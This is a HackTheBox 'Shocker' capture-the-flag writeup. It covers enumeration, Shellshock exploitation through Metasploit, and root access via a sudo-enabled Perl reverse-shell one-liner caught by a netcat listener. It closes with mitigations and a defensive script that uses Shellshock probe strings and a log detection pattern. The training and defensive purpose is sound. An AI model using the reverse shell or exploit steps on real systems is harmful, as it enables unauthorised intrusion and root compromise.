
HackTheBox 'Shocker' writeup

Filed under: writeups
4 minute read


Getting Shells on Shocker


A Quick HackTheBox (HTB) writeup on ‘shocker’




Unfortunately, it looks like the first time I ran through this box, I got frustrated trying to get the exploit to work manually, so ended up being lazy and falling back on metasploit. I will go ahead and publish the writeup with my use of msf, but if I find my notes on how I did it manually, or run through it again, I will update this writeup.

Host Information

Hostname   Operating System   HTB Difficulty Rating
Shocker    Linux              Easy








╰─➤  sudo nmap -sS -sV -O -oA shocker
[sudo] password for initinfosec: 
Starting Nmap 7.80 ( ) at 2019-12-23 10:47 CST
Nmap scan report for
Host is up (0.044s latency).
Not shown: 998 closed ports
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
2222/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
No exact OS matches for host (If you know what OS is running on it, see ).
TCP/IP fingerprint:

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 19.63 seconds

Based on the information provided by apache and ssh, and after some Googling on the versions provided by nmap, it’s likely that this system is Ubuntu Xenial.


further enumeration with dirb


Noticing port 80 is open, I run dirb against the site:

╰─➤  dirb -o shocker_dirb_results.txt                        130 ↵

DIRB v2.22    
By The Dark Raver

OUTPUT_FILE: shocker_dirb_results.txt
START_TIME: Mon Dec 23 10:50:11 2019
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt


GENERATED WORDS: 4612                                                          

---- Scanning URL: ----
+ (CODE:403|SIZE:294)                                    
+ (CODE:200|SIZE:137)                                  
+ (CODE:403|SIZE:299)                               
END_TIME: Mon Dec 23 10:53:52 2019

cgi-bin and server-status I did not have access to. index.html, as expected, is the home page. There’s just an image that says don’t bug me, with nothing hidden in the source, so appears to be a dead end.

Since cgi-bin often houses scripts that apache can pass off to other parts of the OS, I'll run the script again, searching for the extensions sh and pl, looking for script files on the OS that are tied to the URI:

dirb -X .sh,.pl -o dirb_cgi-bin.txt            130 ↵

DIRB v2.22    
By The Dark Raver

OUTPUT_FILE: dirb_cgi-bin.txt
START_TIME: Mon Dec 23 15:29:06 2019
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
EXTENSIONS_LIST: (.sh,.pl) | (.sh)(.pl) [NUM = 2]


GENERATED WORDS: 4612                                                          

---- Scanning URL: ----
+ (CODE:200|SIZE:119)                             
END_TIME: Mon Dec 23 15:36:19 2019

Viewing the one file that was found, we see the following:

Content-Type: text/plain

Just an uptime test script

 16:39:27 up 50 min,  0 users,  load average: 0.00, 0.00, 0.00

exploitation of shellshock via metasploit


Using the shellshock exploit in msf, I set the following:

msf5 exploit(multi/http/apache_mod_cgi_bash_env_exec) > set RHOSTS
msf5 exploit(multi/http/apache_mod_cgi_bash_env_exec) > set targeturi /cgi-bin/
targeturi => /cgi-bin/
msf5 exploit(multi/http/apache_mod_cgi_bash_env_exec) > run

I get a user shell:

meterpreter > shell
Process 11628 created.
Channel 1 created.
ls -ltr
total 4
-rwxr-xr-x 1 root root 113 Sep 22  2017

Running sudo -l, I see that I can run perl as root with sudo NOPASSWD settings.

I will pass a perl command to try and spawn a reverse shell and try to gain a foothold in the system. (I grabbed this from pentestmonkey’s reverse shell cheat sheet):

sudo perl -e 'use Socket;$i="";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

I start a listener on port 1234, and I catch the shell:

sudo nc -lvp 1234
Connection from
/bin/sh: 0: can't access tty; job control turned off
# whoami

Awesome, the shellshock exploit gave us ‘one-shot’ root level access. From here we can grab both the user and root flags from their respective home directories.


Potential mitigations

  • Patch the bash package on the Linux server so it is no longer vulnerable to ShellShock (a patched bash no longer imports function definitions from arbitrary environment variables, which is what lets a crafted HTTP header reach a CGI script as code).
  • If possible, narrow down the amount of information httpd and OpenSSH give out externally via banner grab (an excess of banner/version information makes it easier for an attacker to tailor attacks to the exact software in use).
  • Avoid blanket sudo NOPASSWD privileges for perl; an interpreter that can be run as root without a password is equivalent to handing out root. Refine the sudo rule to the specific script or command that is actually needed, if possible.
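
Two defender-side checks for the first of these points, as an added example that is not part of the original writeup: a local self-test that reports whether the installed bash still has the ShellShock behaviour (so you can confirm the patch landed), and a small scan over Apache access-log lines for the `() {` function-definition prefix that ShellShock-style requests carry in a header. The function names, the `SAMPLE_LOG` lines and the `/cgi-bin/example.sh` path are all constructed for this example and are not taken from the box.

```shell
# Added example (not from the writeup): ShellShock patch verification and
# access-log detection.  Everything below is constructed for illustration.

# Prints "vulnerable" if the local bash executes the trailing command from an
# environment variable shaped like an exported function, "patched" if it treats
# the variable as an ordinary string, and "no-bash" if bash is not installed.
bash_shellshock_status() {
    if ! command -v bash >/dev/null 2>&1; then
        echo "no-bash"
        return 0
    fi
    # A vulnerable bash parses $probe as a function at startup and runs the
    # trailing echo; a patched bash ignores it because it only imports
    # functions from specially named BASH_FUNC_* variables.
    out=$(probe='() { :; }; echo SHELLSHOCK' bash -c ':' 2>/dev/null)
    case "$out" in
        *SHELLSHOCK*) echo "vulnerable" ;;
        *)            echo "patched" ;;
    esac
}

# Constructed Apache combined-format log lines (not captured from the target):
# line 1 is a normal request, line 2 carries the ShellShock prefix in the
# User-Agent header, line 3 carries it in the Referer header.
SAMPLE_LOG='10.0.0.5 - - [23/Dec/2019:10:50:11 -0600] "GET /cgi-bin/example.sh HTTP/1.1" 200 119 "-" "Mozilla/5.0"
10.0.0.9 - - [23/Dec/2019:10:51:02 -0600] "GET /cgi-bin/example.sh HTTP/1.1" 200 119 "-" "() { :;}; echo probe"
10.0.0.9 - - [23/Dec/2019:10:51:07 -0600] "GET /index.html HTTP/1.1" 200 137 "() { :; }; echo probe" "curl/7.64"'

# Prints every log line that contains the literal "() {" prefix anywhere in
# the request, which covers User-Agent, Referer or any other logged header.
# Exit status is grep's: 0 if at least one line matched, 1 if none did.
find_shellshock_requests() {
    printf '%s\n' "$1" | grep -F '() {'
}

# Prints only the number of matching lines (0 when there are none).
count_shellshock_requests() {
    printf '%s\n' "$1" | grep -cF '() {'
}

# Stand-alone run: report the local bash status and the suspicious requests.
echo "local bash: $(bash_shellshock_status)"
echo "suspicious requests in sample log: $(count_shellshock_requests "$SAMPLE_LOG")"
find_shellshock_requests "$SAMPLE_LOG" || true
```

On a real server you would feed `find_shellshock_requests` the contents of the Apache access log instead of `SAMPLE_LOG`, and it only sees what Apache logs: the combined format records User-Agent and Referer, so a prefix sent in another header (Cookie, for example) would need a custom `LogFormat` or a proxy log to show up. For the banner point, Apache's `ServerTokens Prod` and `ServerSignature Off` directives reduce what httpd reveals, and for the sudo point the fix is in `/etc/sudoers`: replace a rule that allows `perl` outright with one that allows only the specific script that needs root.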


That’s it for this box, thanks again, hope it was useful.



hackthebox, HTB, writeups, walkthrough, hacking, pentest, OSCP prep